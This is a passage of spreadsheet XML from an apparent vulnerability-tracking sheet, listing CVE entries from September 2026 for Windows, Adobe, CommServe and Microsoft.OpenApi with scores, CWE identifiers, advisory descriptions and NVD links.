          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K76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62" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K76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63" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S764" s="5" t="inlineStr">
        <is>
          <t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t>
        </is>
      </c>
      <c r="T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K77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771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75998</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr">
        <is>
